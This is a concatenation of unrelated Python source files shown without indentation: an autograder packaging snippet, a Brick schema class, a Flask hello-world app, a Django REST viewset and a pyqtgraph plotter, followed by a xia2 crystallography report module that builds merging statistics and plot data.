grade_cmd_prefix = ''
run_autograder = RUN_AUTOGRADER.format(
grade_cmd_prefix=grade_cmd_prefix)
self._write_string(run_autograder, 'run_autograder', zipfile)
if self.wheel_path is None:
pip_install_arg = 'zucchini==' + ZUCCHINI_VERSION
else:
# Can't just name it `zucchini.whl' or something because
# this upsets pip
wheel_filename = os.path.basename(self.wheel_path)
self._write_file(wheel_filename, zipfile,
real_path=self.wheel_path)
pip_install_arg = wheel_filename
extra_setup_commands = '\n'.join(self.extra_setup_commands)
setup_sh = SETUP_SH.format(
pip_install_arg=pip_install_arg,
prereqs=' '.join(self.prerequisites),
extra_setup_commands=extra_setup_commands)
self._write_string(setup_sh, 'setup.sh', zipfile)
|
from rdflib import Namespace, Graph, Literal, RDF, URIRef
from rdfalchemy.rdfSubject import rdfSubject
from rdfalchemy import rdfSingle, rdfMultiple, rdfList
from brick.brickschema.org.schema._1_0_2.Brick.Discharge_Air_Temperature_Cooling_Setpoint import Discharge_Air_Temperature_Cooling_Setpoint
from brick.brickschema.org.schema._1_0_2.Brick.Supply_Air_Temperature_Cooling_Setpoint import Supply_Air_Temperature_Cooling_Setpoint
from brick.brickschema.org.schema._1_0_2.Brick.Dead_Band_Setpoint import Dead_Band_Setpoint
class Cooling_Supply_Air_Temperature_Dead_Band_Setpoint(Discharge_Air_Temperature_Cooling_Setpoint,Supply_Air_Temperature_Cooling_Setpoint,Dead_Band_Setpoint):
rdf_type = Namespace('https://brickschema.org/schema/1.0.2/Brick#').Cooling_Supply_Air_Temperature_Dead_Band_Setpoint
|
from flask import Flask
app = Flask(__name__)
@app.route("/")
def hello():
return "Hello, World!", 200
if __name__ == "__main__":
from os.path import dirname
from frameworks.common import run_gunicorn
run_gunicorn(
cwd=dirname(__file__),
app="hello:app",
worker="meinheld",
)
|
import json
from django.core.files import File
from django_filters.rest_framework import DjangoFilterBackend
from rest_framework import status, filters, viewsets
from django.contrib.auth.models import User
from rest_framework.authtoken.models import Token
from rest_framework.decorators import action
from rest_framework.permissions import AllowAny, IsAuthenticated
from rest_framework.response import Response
from rest_framework.settings import api_settings
# Importar los modelos
from api.models import Seccion
# Importar los serializer
from api.serializers import SeccionSerializer, SeccionRegistroSerializer
# Importar IsDirector
from api.permissions import IsDirector
#
from django.db.models import Count
""" VIEWSETS Seccion """
class SeccionViewSet(viewsets.ModelViewSet):
#
queryset = Seccion.objects.filter(activo=True)
# Permiso
permission_classes = (IsDirector,)
# FILTROS DE BUSQUEDA Y ORDENAMIENTO
filter_backends = (DjangoFilterBackend, filters.SearchFilter, filters.OrderingFilter)
# ESPECIFICA A QUE CAMPO SE LE ASIGNARA LOS FILTROS
filter_fields = ("nombre_seccion",)
search_fields = ("nombre_seccion",)
ordering_fields = ("nombre_seccion",)
# FUNCION QUE VALIDA QUE SERIALIZADOR A UTILIZAR (list / retrieve)
def get_serializer_class(self):
"""Define serializer for API"""
#
if self.action == 'list' or self.action == 'retrieve':
return SeccionSerializer
else:
return SeccionRegistroSerializer
# Sobreescribir el metodo list
@action(detail=False, methods=['get'])
def totalSecciones (self, request):
try:
queryset = Seccion.objects.filter(
activo=True
).aggregate(
total_seccion =Count(
'id'
)
)
return Response(queryset, status=status.HTTP_200_OK)
except Exception as e:
return Response({'detail', str(e)}, status=status.HTTP_400_BAD_REQUEST) |
import numpy as np
import time
from lib.datetimehandler import DateUtility
from lib.pyqtgraph import *
from lib.ui.dateaxis import DateAxis
__author__ = 'aco-nav'
class DateAxis(AxisItem):
def tickStrings(self,values,scale,spacing):
strns = []
dtu = DateUtility()
strns = [dtu.todate(x) for x in values]
return strns
#return AxisItem.tickStrings(self, , scale, spacing)
def _tickStrings(self, values, scale, spacing):
strns = []
rng = max(values)-min(values)
#if rng < 120:
# return AxisItem.tickStrings(self, values, scale, spacing)
if rng < 3600*24:
string = '%H:%M:%S'
label1 = '%b %d -'
label2 = ' %b %d, %Y'
elif rng >= 3600*24 and rng < 3600*24*30:
string = '%d'
label1 = '%b - '
label2 = '%b, %Y'
elif rng >= 3600*24*30 and rng < 3600*24*30*24:
string = '%b'
label1 = '%Y -'
label2 = ' %Y'
elif rng >=3600*24*30*24:
string = '%Y'
label1 = ''
label2 = ''
for x in values:
try:
strns.append(time.strftime(string, time.localtime(x)))
except ValueError: ## Windows can't handle dates before 1970
strns.append('')
try:
label = time.strftime(label1, time.localtime(min(values)))+time.strftime(label2, time.localtime(max(values)))
except ValueError:
label = ''
self.setLabel(text=label)
return strns
class Plotter(GraphicsLayoutWidget):
def __init__(self,parent=None):
super(Plotter,self).__init__(parent=None,border=(100, 100, 100))
self.setBackground((0,0,0))
self.dateutil = DateUtility()
xaxis = DateAxis(orientation='bottom')
self._plt = self.addPlot(row=0,col=0,axisItems={'bottom':xaxis})
self._plt.addLegend()
self._plt.setLabel("left", "Degrees Relative to Orientation")
self.region = LinearRegionItem()
self._plt.addItem(self.region, ignoreBounds=True)
self.region.setZValue(10)
self._plt.sigRangeChanged.connect(self.updateRegion)
self._plt.setAutoVisible(y=True)
self.label =LabelItem(justify='right')
self._plt.setLabel("bottom", "Time Shift")
self._plt.showGrid(x=True,y=True)
self.vLine = InfiniteLine(angle=90, movable=False, pen="r")
self.hLine = InfiniteLine(angle=0, movable=False, pen="r")
self._plt.addItem(self.vLine, ignoreBounds=True)
self._plt.addItem(self.hLine, ignoreBounds=True)
self._plt.addItem(self.label)
self.vb = self._plt.vb
self.region.sigRegionChanged.connect(self.update)
self.region.setRegion([int(self.dateutil.currentepoch()),int(self.dateutil.currentepoch()+18000)])
self._plt.scene().sigMouseMoved.connect(self.mouseMoved)
self._plt.setXRange(int(self.dateutil.currentepoch()),int(self.dateutil.currentepoch()+18000), padding=0)
def updateRegion(self, window, viewRange):
rgn = viewRange[0]
#self.region.setRegion(rgn)
def mouseMoved(self, evt):
#pos = evt ## using signal proxy turns original arguments into a tuple
if self._plt.sceneBoundingRect().contains(evt):
mousePoint = self.vb.mapSceneToView(evt)
index = int(mousePoint.x())
#if index > 0 and index < len(data1):
# self.label.setText("<span style='font-size: 12pt'>x=%0.1f, <span style='color: red'>y1=%0.1f</span>, <span style='color: green'>y2=%0.1f</span>" % (mousePoint.x(), data1[index], data2[index]))
self.vLine.setPos(mousePoint.x())
self.hLine.setPos(mousePoint.y())
def update(self):
self.region.setZValue(10)
minX, maxX = self.region.getRegion()
#self._plt.setXRange(minX, maxX, padding=0)
@property
def plotter(self):
return self._plt
def clearPlot(self):
pass
#plt = Plotter()
#xaxis = DateAxis(orientation='bottom')
#graph = plt.addPlot(row=0,col=0,axisItems={'bottom':xaxis})
#graph.setLabel("left", "Degrees Relative to Orientation")
#graph.showGrid(x=True,y=True)
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
import json
import os
from collections import OrderedDict
from six.moves import cStringIO as StringIO
import iotbx.phil
import xia2.Handlers.Environment
import xia2.Handlers.Files
from cctbx.array_family import flex
from mmtbx.scaling import printed_output
from xia2.Modules.Analysis import *
class xtriage_output(printed_output):
def __init__(self, out):
super(xtriage_output, self).__init__(out)
self.gui_output = True
self._out_orig = self.out
self.out = StringIO()
self._sub_header_to_out = {}
def show_big_header(self, text): pass
def show_header(self, text):
self._out_orig.write(self.out.getvalue())
self.out = StringIO()
super(xtriage_output, self).show_header(text)
def show_sub_header(self, title):
self._out_orig.write(self.out.getvalue())
self.out = StringIO()
self._current_sub_header = title
assert title not in self._sub_header_to_out
self._sub_header_to_out[title] = self.out
def flush(self):
self._out_orig.write(self.out.getvalue())
self.out.flush()
self._out_orig.flush()
class xia2_report(object):
def __init__(self, unmerged_mtz, params, base_dir=None):
from iotbx.reflection_file_reader import any_reflection_file
self.unmerged_mtz = unmerged_mtz
self.params = params
reader = any_reflection_file(unmerged_mtz)
assert reader.file_type() == 'ccp4_mtz'
arrays = reader.as_miller_arrays(merge_equivalents=False)
self.intensities = None
self.batches = None
self.scales = None
self.dose = None
self._xanalysis = None
for ma in arrays:
if ma.info().labels == ['BATCH']:
self.batches = ma
elif ma.info().labels == ['DOSE']:
self.dose = ma
elif ma.info().labels == ['I', 'SIGI']:
self.intensities = ma
elif ma.info().labels == ['I(+)', 'SIGI(+)', 'I(-)', 'SIGI(-)']:
self.intensities = ma
elif ma.info().labels == ['SCALEUSED']:
self.scales = ma
assert self.intensities is not None
assert self.batches is not None
self.mtz_object = reader.file_content()
crystal_name = (filter(lambda c: c != 'HKL_base',
map(lambda c: c.name(), self.mtz_object.crystals()))
or ['DEFAULT'])[0]
self.report_dir = base_dir or xia2.Handlers.Environment.Environment.generate_directory([crystal_name, 'report'])
self.indices = self.mtz_object.extract_original_index_miller_indices()
self.intensities = self.intensities.customized_copy(
indices=self.indices, info=self.intensities.info())
self.batches = self.batches.customized_copy(
indices=self.indices, info=self.batches.info())
self._compute_merging_stats()
if params.anomalous:
self.intensities = self.intensities.as_anomalous_array()
self.batches = self.batches.as_anomalous_array()
self.intensities.setup_binner(n_bins=self.params.resolution_bins)
self.merged_intensities = self.intensities.merge_equivalents().array()
def _compute_merging_stats(self):
from iotbx import merging_statistics
self.merging_stats = merging_statistics.dataset_statistics(
self.intensities, n_bins=self.params.resolution_bins,
cc_one_half_significance_level=self.params.cc_half_significance_level,
eliminate_sys_absent=self.params.eliminate_sys_absent,
use_internal_variance=self.params.use_internal_variance,
assert_is_not_unique_set_under_symmetry=False)
intensities_anom = self.intensities.as_anomalous_array()
intensities_anom = intensities_anom.map_to_asu().customized_copy(info=self.intensities.info())
self.merging_stats_anom = merging_statistics.dataset_statistics(
intensities_anom, n_bins=self.params.resolution_bins, anomalous=True,
cc_one_half_significance_level=self.params.cc_half_significance_level,
eliminate_sys_absent=self.params.eliminate_sys_absent,
use_internal_variance=self.params.use_internal_variance,
assert_is_not_unique_set_under_symmetry=False)
self.d_star_sq_bins = [
(1/bin_stats.d_min**2) for bin_stats in self.merging_stats.bins]
self.d_star_sq_tickvals, self.d_star_sq_ticktext = d_star_sq_to_d_ticks(self.d_star_sq_bins, nticks=5)
def multiplicity_plots(self):
from xia2.Wrappers.XIA.PlotMultiplicity import PlotMultiplicity
mult_json_files = {}
mult_img_files = {}
from xia2.lib.bits import auto_logfiler
cwd = os.getcwd()
try:
os.chdir(self.report_dir)
for axis in ('h', 'k', 'l'):
pm = PlotMultiplicity()
pm.set_mtz_filename(self.unmerged_mtz)
pm.set_slice_axis(axis)
pm.set_show_missing(True)
auto_logfiler(pm)
pm.run()
mult_json_files[axis] = pm.get_json_filename()
with open(pm.get_plot_filename(), 'rb') as fh:
mult_img_files[axis] = fh.read().encode('base64').replace('\n', '')
return OrderedDict(('multiplicity_%s' %axis, mult_img_files[axis])
for axis in ('h', 'k', 'l'))
finally:
os.chdir(cwd)
def merging_statistics_table(self):
headers = [u'Resolution (Å)', 'N(obs)', 'N(unique)', 'Multiplicity', 'Completeness',
'Mean(I)', 'Mean(I/sigma)', 'Rmerge', 'Rmeas', 'Rpim', 'CC1/2']
if not self.intensities.space_group().is_centric():
headers.append('CCano')
rows = []
def safe_format(format_str, item):
return format_str %item if item is not None else ''
for bin_stats in self.merging_stats.bins:
row = ['%.2f - %.2f' %(bin_stats.d_max, bin_stats.d_min),
bin_stats.n_obs, bin_stats.n_uniq, '%.2f' %bin_stats.mean_redundancy,
'%.2f' %(100*bin_stats.completeness), '%.1f' %bin_stats.i_mean,
'%.1f' %bin_stats.i_over_sigma_mean, safe_format('%.3f', bin_stats.r_merge),
safe_format('%.3f', bin_stats.r_meas), safe_format('%.3f', bin_stats.r_pim)]
if self.params.cc_half_method == 'sigma_tau':
row.append(
'%.3f%s' %(bin_stats.cc_one_half_sigma_tau,
'*' if bin_stats.cc_one_half_sigma_tau_significance else ''))
else:
row.append(
'%.3f%s' %(bin_stats.cc_one_half,
'*' if bin_stats.cc_one_half_significance else ''))
if not self.intensities.space_group().is_centric():
row.append(
'%.3f%s' %(bin_stats.cc_anom, '*' if bin_stats.cc_anom_significance else ''))
rows.append(row)
merging_stats_table = [headers]
merging_stats_table.extend(rows)
return merging_stats_table
def overall_statistics_table(self):
headers = ['', 'Overall', 'Low resolution', 'High resolution']
stats = (self.merging_stats.overall, self.merging_stats.bins[0],
self.merging_stats.bins[-1])
rows = [
[u'Resolution (Å)'] + [
'%.2f - %.2f' %(s.d_max, s.d_min) for s in stats],
['Observations'] + ['%i' %s.n_obs for s in stats],
['Unique reflections'] + ['%i' %s.n_uniq for s in stats],
['Multiplicity'] + ['%.1f' %s.mean_redundancy for s in stats],
['Completeness'] + ['%.2f%%' %(s.completeness * 100) for s in stats],
#['Mean intensity'] + ['%.1f' %s.i_mean for s in stats],
['Mean I/sigma(I)'] + ['%.1f' %s.i_over_sigma_mean for s in stats],
['Rmerge'] + ['%.3f' %s.r_merge for s in stats],
['Rmeas'] + ['%.3f' %s.r_meas for s in stats],
['Rpim'] + ['%.3f' %s.r_pim for s in stats],
]
if self.params.cc_half_method == 'sigma_tau':
rows.append(['CC1/2'] + ['%.3f' %s.cc_one_half_sigma_tau for s in stats])
else:
rows.append(['CC1/2'] + ['%.3f' %s.cc_one_half for s in stats])
rows = [[u'<strong>%s</strong>' %r[0]] + r[1:] for r in rows]
overall_stats_table = [headers]
overall_stats_table.extend(rows)
return overall_stats_table
def symmetry_table_html(self):
symmetry_table_html = """
<p>
<b>Filename:</b> %s
<br>
<b>Unit cell:</b> %s
<br>
<b>Space group:</b> %s
</p>
""" %(os.path.abspath(self.unmerged_mtz),
self.intensities.space_group_info().symbol_and_number(),
str(self.intensities.unit_cell()))
return symmetry_table_html
def xtriage_report(self):
xtriage_success = []
xtriage_warnings = []
xtriage_danger = []
s = StringIO()
pout = printed_output(out=s)
from mmtbx.scaling.xtriage import xtriage_analyses
from mmtbx.scaling.xtriage import master_params as xtriage_master_params
xtriage_params = xtriage_master_params.fetch(sources=[]).extract()
xtriage_params.scaling.input.xray_data.skip_sanity_checks = True
xanalysis = xtriage_analyses(
miller_obs=self.merged_intensities,
unmerged_obs=self.intensities, text_out=pout,
params=xtriage_params,
)
with open(os.path.join(self.report_dir, 'xtriage.log'), 'wb') as f:
f.write(s.getvalue())
xia2.Handlers.Files.FileHandler.record_log_file('Xtriage',
os.path.join(self.report_dir, 'xtriage.log'))
xs = StringIO()
xout = xtriage_output(xs)
xanalysis.show(out=xout)
xout.flush()
sub_header_to_out = xout._sub_header_to_out
issues = xanalysis.summarize_issues()
#issues.show()
for level, text, sub_header in issues._issues:
summary = sub_header_to_out.get(sub_header, StringIO()).getvalue()
summary = summary.replace('<', '<').replace('>', '>')
d = {
'level': level,
'text': text,
'summary': summary,
'header': sub_header,
}
if level == 0: xtriage_success.append(d)
elif level == 1: xtriage_warnings.append(d)
elif level == 2: xtriage_danger.append(d)
self._xanalysis = xanalysis
return xtriage_success, xtriage_warnings, xtriage_danger
def i_over_sig_i_plot(self):
i_over_sig_i_bins = [
bin_stats.i_over_sigma_mean for bin_stats in self.merging_stats.bins]
return {
'i_over_sig_i': {
'data': [{
'x': self.d_star_sq_bins, # d_star_sq
'y': i_over_sig_i_bins,
'type': 'scatter',
'name': 'I/sigI vs resolution',
}],
'layout': {
'title': '<I/sig(I)> vs resolution',
'xaxis': {
'title': u'Resolution (Å)',
'tickvals': self.d_star_sq_tickvals,
'ticktext': self.d_star_sq_ticktext,
},
'yaxis': {
'title': '<I/sig(I)>',
'rangemode': 'tozero'
},
}
}
}
def i_over_sig_i_vs_batch_plot(self):
from xia2.Modules.PyChef2.PyChef import remove_batch_gaps
new_batch_data = remove_batch_gaps(self.batches.data())
new_batches = self.batches.customized_copy(data=new_batch_data)
result = i_sig_i_vs_batch(self.intensities, new_batches)
return {
'i_over_sig_i_vs_batch': {
'data': [
{
'x': result.batches,
'y': result.data,
'type': 'scatter',
'name': 'I/sigI vs batch',
'opacity': 0.75,
},
],
'layout': {
'title': '<I/sig(I)> vs batch',
'xaxis': {'title': 'N'},
'yaxis': {
'title': '<I/sig(I)>',
'rangemode': 'tozero'
},
},
}
}
def cc_one_half_plot(self):
if self.params.cc_half_method == 'sigma_tau':
cc_one_half_bins = [
bin_stats.cc_one_half_sigma_tau for bin_stats in self.merging_stats.bins]
cc_one_half_critical_value_bins = [
bin_stats.cc_one_half_sigma_tau_critical_value for bin_stats in self.merging_stats.bins]
else:
cc_one_half_bins = [
bin_stats.cc_one_half for bin_stats in self.merging_stats.bins]
cc_one_half_critical_value_bins = [
bin_stats.cc_one_half_critical_value for bin_stats in self.merging_stats.bins]
cc_anom_bins = [
bin_stats.cc_anom for bin_stats in self.merging_stats.bins]
cc_anom_critical_value_bins = [
bin_stats.cc_anom_critical_value for bin_stats in self.merging_stats.bins]
return {
'cc_one_half': {
'data': [
{
'x': self.d_star_sq_bins, # d_star_sq
'y': cc_one_half_bins,
'type': 'scatter',
'name': 'CC-half',
'mode': 'lines',
'line': {
'color': 'rgb(31, 119, 180)',
},
},
{
'x': self.d_star_sq_bins, # d_star_sq
'y': cc_one_half_critical_value_bins,
'type': 'scatter',
'name': 'CC-half critical value (p=0.01)',
'line': {
'color': 'rgb(31, 119, 180)',
'dash': 'dot',
},
},
({
'x': self.d_star_sq_bins, # d_star_sq
'y': cc_anom_bins,
'type': 'scatter',
'name': 'CC-anom',
'mode': 'lines',
'line': {
'color': 'rgb(255, 127, 14)',
},
} if not self.intensities.space_group().is_centric() else {}),
({
'x': self.d_star_sq_bins, # d_star_sq
'y': cc_anom_critical_value_bins,
'type': 'scatter',
'name': 'CC-anom critical value (p=0.01)',
'mode': 'lines',
'line': {
'color': 'rgb(255, 127, 14)',
'dash': 'dot',
},
} if not self.intensities.space_group().is_centric() else {}),
],
'layout':{
'title': 'CC-half vs resolution',
'xaxis': {
'title': u'Resolution (Å)',
'tickvals': self.d_star_sq_tickvals,
'ticktext': self.d_star_sq_ticktext,
},
'yaxis': {
'title': 'CC-half',
'range': [min(cc_one_half_bins + cc_anom_bins + [0]), 1]
},
},
'help': '''\
The correlation coefficients, CC1/2, between random half-datasets. A correlation
coefficient of +1 indicates good correlation, and 0 indicates no correlation.
CC1/2 is typically close to 1 at low resolution, falling off to close to zero at
higher resolution. A typical resolution cutoff based on CC1/2 is around 0.3-0.5.
[1] Karplus, P. A., & Diederichs, K. (2012). Science, 336(6084), 1030-1033.
https://doi.org/10.1126/science.1218231
[2] Diederichs, K., & Karplus, P. A. (2013). Acta Cryst D, 69(7), 1215-1222.
https://doi.org/10.1107/S0907444913001121
[3] Evans, P. R., & Murshudov, G. N. (2013). Acta Cryst D, 69(7), 1204-1214.
https://doi.org/10.1107/S0907444913000061
'''
}
}
def scale_rmerge_vs_batch_plot(self):
from xia2.Modules.PyChef2.PyChef import remove_batch_gaps
new_batch_data = remove_batch_gaps(self.batches.data())
new_batches = self.batches.customized_copy(data=new_batch_data)
if self.scales is not None:
sc_vs_b = scales_vs_batch(self.scales, new_batches)
rmerge_vs_b = rmerge_vs_batch(self.intensities, new_batches)
return {
'scale_rmerge_vs_batch': {
'data': [
({
'x': sc_vs_b.batches,
'y': sc_vs_b.data,
'type': 'scatter',
'name': 'Scale',
'opacity': 0.75,
} if self.scales is not None else {}),
{
'x': rmerge_vs_b.batches,
'y': rmerge_vs_b.data,
'yaxis': 'y2',
'type': 'scatter',
'name': 'Rmerge',
'opacity': 0.75,
},
],
'layout': {
'title': 'Scale and Rmerge vs batch',
'xaxis': {'title': 'N'},
'yaxis': {
'title': 'Scale',
'rangemode': 'tozero'
},
'yaxis2': {
'title': 'Rmerge',
'overlaying': 'y',
'side': 'right',
'rangemode': 'tozero'
}
},
}
}
def completeness_plot(self):
completeness_bins = [
bin_stats.completeness for bin_stats in self.merging_stats.bins]
anom_completeness_bins = [
bin_stats.anom_completeness for bin_stats in self.merging_stats_anom.bins]
return {
'completeness': {
'data': [
{
'x': self.d_star_sq_bins,
'y': completeness_bins,
'type': 'scatter',
'name': 'Completeness',
},
({
'x': self.d_star_sq_bins,
'y': anom_completeness_bins,
'type': 'scatter',
'name': 'Anomalous completeness',
} if not self.intensities.space_group().is_centric() else {}),
],
'layout':{
'title': 'Completeness vs resolution',
'xaxis': {
'title': u'Resolution (Å)',
'tickvals': self.d_star_sq_tickvals,
'ticktext': self.d_star_sq_ticktext,
},
'yaxis': {
'title': 'Completeness',
'range': (0, 1),
},
},
}
}
def multiplicity_histogram(self):
merging = self.intensities.merge_equivalents()
multiplicities = merging.redundancies().complete_array(new_data_value=0)
mult_acentric = multiplicities.select_acentric().data()
mult_centric = multiplicities.select_centric().data()
multiplicities_acentric = {}
multiplicities_centric = {}
for x in sorted(set(mult_acentric)):
multiplicities_acentric[x] = mult_acentric.count(x)
for x in sorted(set(mult_centric)):
multiplicities_centric[x] = mult_centric.count(x)
return {
'multiplicities': {
'data': [
{
'x': multiplicities_acentric.keys(),
'y': multiplicities_acentric.values(),
'type': 'bar',
'name': 'Acentric',
'opacity': 0.75,
},
{
'x': multiplicities_centric.keys(),
'y': multiplicities_centric.values(),
'type': 'bar',
'name': 'Centric',
'opacity': 0.75,
},
],
'layout': {
'title': 'Distribution of multiplicities',
'xaxis': {'title': 'Multiplicity'},
'yaxis': {
'title': 'Frequency',
#'rangemode': 'tozero'
},
'bargap': 0,
'barmode': 'overlay',
},
}
}
def multiplicity_vs_resolution_plot(self):
multiplicity_bins = [
bin_stats.mean_redundancy for bin_stats in self.merging_stats.bins]
anom_multiplicity_bins = [
bin_stats.mean_redundancy for bin_stats in self.merging_stats_anom.bins]
return {
'multiplicity_vs_resolution': {
'data': [
{
'x': self.d_star_sq_bins,
'y': multiplicity_bins,
'type': 'scatter',
'name': 'Multiplicity',
},
({
'x': self.d_star_sq_bins,
'y': anom_multiplicity_bins,
'type': 'scatter',
'name': 'Anomalous multiplicity',
} if not self.intensities.space_group().is_centric() else {}),
],
'layout':{
'title': 'Multiplicity vs resolution',
'xaxis': {
'title': u'Resolution (Å)',
'tickvals': self.d_star_sq_tickvals,
'ticktext': self.d_star_sq_ticktext,
},
'yaxis': {
'title': 'Multiplicity',
},
},
},
}
def second_moments_plot(self):
acentric = self.merged_intensities.select_acentric()
centric = self.merged_intensities.select_centric()
if acentric.size():
acentric.setup_binner(n_bins=self.params.resolution_bins)
second_moments_acentric = acentric.second_moment_of_intensities(use_binning=True)
else:
second_moments_acentric = None
if centric.size():
centric.setup_binner(n_bins=self.params.resolution_bins)
second_moments_centric = centric.second_moment_of_intensities(use_binning=True)
else:
second_moments_centric = None
second_moment_d_star_sq = []
if acentric.size():
second_moment_d_star_sq.extend(second_moments_acentric.binner.bin_centers(2))
if centric.size():
second_moment_d_star_sq.extend(second_moments_centric.binner.bin_centers(2))
tickvals_2nd_moment, ticktext_2nd_moment = d_star_sq_to_d_ticks(
second_moment_d_star_sq, nticks=5)
return {
'second_moments': {
'data': [
({
'x': list(second_moments_acentric.binner.bin_centers(2)), # d_star_sq
'y': second_moments_acentric.data[1:-1],
'type': 'scatter',
'name': '<I^2> acentric',
} if acentric.size() else {}),
({
'x': list(second_moments_centric.binner.bin_centers(2)), # d_star_sq
'y': second_moments_centric.data[1:-1],
'type': 'scatter',
'name': '<I^2> centric',
} if centric.size() else {})
],
'layout': {
'title': 'Second moment of I',
'xaxis': {
'title': u'Resolution (Å)',
'tickvals': tickvals_2nd_moment,
'ticktext': ticktext_2nd_moment,
},
'yaxis': {
'title': '<I^2>',
'rangemode': 'tozero'
},
}
}
}
def cumulative_intensity_distribution_plot(self):
if not self._xanalysis or not self._xanalysis.twin_results:
return {}
nz_test = self._xanalysis.twin_results.nz_test
return {
'cumulative_intensity_distribution': {
'data': [
{
'x': list(nz_test.z),
'y': list(nz_test.ac_obs),
'type': 'scatter',
'name': 'Acentric observed',
'mode': 'lines',
'line': {
'color': 'rgb(31, 119, 180)',
},
},
{
'x': list(nz_test.z),
'y': list(nz_test.c_obs),
'type': 'scatter',
'name': 'Centric observed',
'mode': 'lines',
'line': {
'color': 'rgb(255, 127, 14)',
},
},
{
'x': list(nz_test.z),
'y': list(nz_test.ac_untwinned),
'type': 'scatter',
'name': 'Acentric theory',
'mode': 'lines',
'line': {
'color': 'rgb(31, 119, 180)',
'dash': 'dot',
},
'opacity': 0.8,
},
{
'x': list(nz_test.z),
'y': list(nz_test.c_untwinned),
'type': 'scatter',
'name': 'Centric theory',
'mode': 'lines',
'line': {
'color': 'rgb(255, 127, 14)',
'dash': 'dot',
},
'opacity': 0.8,
},
],
'layout': {
'title': 'Cumulative intensity distribution',
'xaxis': {
'title': 'z',
'range': (0, 1),
},
'yaxis': {
'title': 'P(Z <= Z)',
'range': (0, 1),
},
}
}
}
def l_test_plot(self):
if not self._xanalysis or not self._xanalysis.twin_results:
return {}
l_test = self._xanalysis.twin_results.l_test
return {
'l_test': {
'data': [
{
'x': list(l_test.l_values),
'y': list(l_test.l_cumul_untwinned),
'type': 'scatter',
'name': 'Untwinned',
'mode': 'lines',
'line': {
'color': 'rgb(31, 119, 180)',
'dash': 'dashdot',
},
},
{
'x': list(l_test.l_values),
'y': list(l_test.l_cumul_perfect_twin),
'type': 'scatter',
'name': 'Perfect twin',
'mode': 'lines',
'line': {
'color': 'rgb(31, 119, 180)',
'dash': 'dot',
},
'opacity': 0.8,
},
{
'x': list(l_test.l_values),
'y': list(l_test.l_cumul),
'type': 'scatter',
'name': 'Observed',
'mode': 'lines',
'line': {
'color': 'rgb(255, 127, 14)',
},
},
],
'layout': {
'title': 'L test (Padilla and Yeates)',
'xaxis': {
'title': '|l|',
'range': (0, 1),
},
'yaxis': {
'title': 'P(L >= l)',
'range': (0, 1),
},
}
}
}
def wilson_plot(self):
if not self._xanalysis or not self._xanalysis.wilson_scaling:
return {}
wilson_scaling = self._xanalysis.wilson_scaling
tickvals_wilson, ticktext_wilson = d_star_sq_to_d_ticks(
wilson_scaling.d_star_sq, nticks=5)
return {
'wilson_intensity_plot': {
'data': ([
{
'x': list(wilson_scaling.d_star_sq),
'y': list(wilson_scaling.mean_I_obs_data),
'type': 'scatter',
'name': 'Observed',
},
{
'x': list(wilson_scaling.d_star_sq),
'y': list(wilson_scaling.mean_I_obs_theory),
'type': 'scatter',
'name': 'Expected',
},
{
'x': list(wilson_scaling.d_star_sq),
'y': list(wilson_scaling.mean_I_normalisation),
'type': 'scatter',
'name': 'Smoothed',
}]),
'layout': {
'title': 'Wilson intensity plot',
'xaxis': {
'title': u'Resolution (Å)',
'tickvals': tickvals_wilson,
'ticktext': ticktext_wilson,
},
'yaxis': {
'type': 'log',
'title': 'Mean(I)',
'rangemode': 'tozero',
},
},
}
}
def pychef_plots(self, n_bins=8):
from xia2.Modules.PyChef2 import PyChef
intensities = self.intensities
batches = self.batches
dose = self.dose
if self.params.chef_min_completeness:
d_min = PyChef.resolution_limit(
mtz_file=self.unmerged_mtz, min_completeness=self.params.chef_min_completeness, n_bins=n_bins)
print('Estimated d_min for CHEF analysis: %.2f' % d_min)
sel = flex.bool(intensities.size(), True)
d_spacings = intensities.d_spacings().data()
sel &= d_spacings >= d_min
intensities = intensities.select(sel)
batches = batches.select(sel)
if dose is not None:
dose = dose.select(sel)
if dose is None:
dose = PyChef.batches_to_dose(batches.data(), self.params.dose)
else:
dose = dose.data()
pychef_stats = PyChef.Statistics(intensities, dose, n_bins=n_bins)
return pychef_stats.to_dict()
def d_star_sq_to_d_ticks(d_star_sq, nticks):
from cctbx import uctbx
d_spacings = uctbx.d_star_sq_as_d(flex.double(d_star_sq))
min_d_star_sq = min(d_star_sq)
dstep = (max(d_star_sq) - min_d_star_sq)/nticks
tickvals = list(min_d_star_sq + (i*dstep) for i in range(nticks))
ticktext = ['%.2f' %(uctbx.d_star_sq_as_d(dsq)) for dsq in tickvals]
return tickvals, ticktext
phil_scope = iotbx.phil.parse('''\
title = 'xia2 report'
.type = str
prefix = 'xia2'
.type = str
log_include = None
.type = path
include scope xia2.Modules.Analysis.phil_scope
''', process_includes=True)
def run(args):
from xia2.XIA2Version import Version
interp = phil_scope.command_line_argument_interpreter()
params, unhandled = interp.process_and_fetch(
args, custom_processor='collect_remaining')
params = params.extract()
args = unhandled
unmerged_mtz = args[0]
report = xia2_report(unmerged_mtz, params, base_dir='.')
overall_stats_table = report.overall_statistics_table()
merging_stats_table = report.merging_statistics_table()
symmetry_table_html = report.symmetry_table_html()
# xtriage
xtriage_success, xtriage_warnings, xtriage_danger = None, None, None
if params.xtriage_analysis:
xtriage_success, xtriage_warnings, xtriage_danger = report.xtriage_report()
json_data = {}
json_data.update(report.multiplicity_vs_resolution_plot())
json_data.update(report.multiplicity_histogram())
json_data.update(report.completeness_plot())
json_data.update(report.scale_rmerge_vs_batch_plot())
json_data.update(report.cc_one_half_plot())
json_data.update(report.i_over_sig_i_plot())
json_data.update(report.i_over_sig_i_vs_batch_plot())
json_data.update(report.second_moments_plot())
json_data.update(report.cumulative_intensity_distribution_plot())
json_data.update(report.l_test_plot())
json_data.update(report.wilson_plot())
json_data.update(report.pychef_plots())
resolution_graphs = OrderedDict(
(k, json_data[k]) for k in
('cc_one_half', 'i_over_sig_i', 'second_moments', 'wilson_intensity_plot',
'completeness', 'multiplicity_vs_resolution') if k in json_data)
if params.include_radiation_damage:
batch_graphs = OrderedDict(
(k, json_data[k]) for k in
('scale_rmerge_vs_batch', 'i_over_sig_i_vs_batch', 'completeness_vs_dose',
'rcp_vs_dose', 'scp_vs_dose', 'rd_vs_batch_difference'))
else:
batch_graphs = OrderedDict(
(k, json_data[k]) for k in
('scale_rmerge_vs_batch', 'i_over_sig_i_vs_batch'))
misc_graphs = OrderedDict(
(k, json_data[k]) for k in
('cumulative_intensity_distribution', 'l_test', 'multiplicities') if k in json_data)
for k, v in report.multiplicity_plots().iteritems():
misc_graphs[k] = {'img': v}
styles = {}
